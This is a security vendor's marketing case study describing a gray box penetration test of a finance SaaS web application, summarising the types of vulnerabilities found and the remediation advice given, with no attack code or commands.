en flag +1 214 306 68 37
Gray Box Penetration Testing for an Enterprise Finance SaaS

Gray Box Penetration Testing for an Enterprise Finance SaaS

Industry
BFSI, Software products

About Our Customer

The Customer is a US-based SaaS company offering workforce management and financial management solutions.

Need for a Pentesting Vendor with Expertise in Financial Software

To ensure the maximum security of its clients’ financial data, the Customer was looking for a cybersecurity vendor with experience in the finance sector. Trusting our expertise in cybersecurity and financial IT, the Customer turned to ScienceSoft to examine the web application for its spend management SaaS platform.

Pentesting Revealed Security Flaws Endangering Clients’ Financial Data

ScienceSoft’s experts conducted security testing of the Customer’s web app following the PTES, OWASP Web Security Testing Guide, and NIST 800-115 methodology. The process started with vulnerability assessment: our testers scanned the target application and manually validated the detected security weaknesses to eliminate false positives.

To evaluate the potential impact of the found security gaps, ScienceSoft’s team performed gray box pentesting. After getting low-privilege user credentials from the Customer, ScienceSoft’s team explored the vulnerabilities by acting as an intruder who gained access to the target web application.

During the pentesting, ScienceSoft revealed authentication and authorization flaws, a lack of resources and rate limiting, security misconfigurations, CSV injection flaws, and other security issues. Our pentesters suggested protective measures to secure the Customer’s app, including:

  • Enforcing a proper access control mechanism to make sure that regular users cannot access information and features intended for privileged users. Otherwise, broken access control could result in sensitive data disclosure, data manipulation, or data loss.
  • Enforcing request rate limiting and strict limits on pagination parameters. Without these restrictions, an attacker would be able to overload the server by sending too many requests or requesting more data than intended, causing excessive resource consumption, issues with database performance, and denial of service (DoS).
  • Implementing subresource integrity checks (SRI) for scripts loaded from third-party domains. This would reduce the risk of possible malware infection, user data leakage, and execution of malicious JavaScript.
  • Implementing input validation to prohibit entering special characters in the website forms available for import/export as a CSV file. Additionally, our experts suggested applying field data sanitization when the app content is exported as a CSV file. These measures would protect the app users from CSV files with malicious commands embedded in spreadsheet formulas, which could be used to hijack user PCs.

Full Insight Into Web Security Flaws Drives Rapid Remediation

In only ten days, the Customer received a comprehensive report summarizing the testing activities, the assessment results, and a prioritized list of corrective actions for each found vulnerability. Our detailed remediation advice helped the Customer quickly fortify the security of its spend management application and ensure full protection of its clients’ sensitive data.

Technologies and Tools

BurpSuite, SSLScan, Nmap, SQLMap, JWT_Tool, Nikto, Zed Attack Proxy (ZAP), PHP, Bash, Python, PowerShell.

Have a question to our team or need help with your project?

Our team is ready to provide client references, estimate your project, or answer any other question related to your IT initiative.

Upload file

Drag and drop or to upload your file(s)

?

Max file size 10MB, up to 5 files and 20MB total

Supported formats:

doc, docx, xls, xlsx, ppt, pptx, pps, ppsx, odp, jpeg, jpg, png, psd, webp, svg, mp3, mp4, webm, odt, ods, pdf, rtf, txt, csv, log

More Case Studies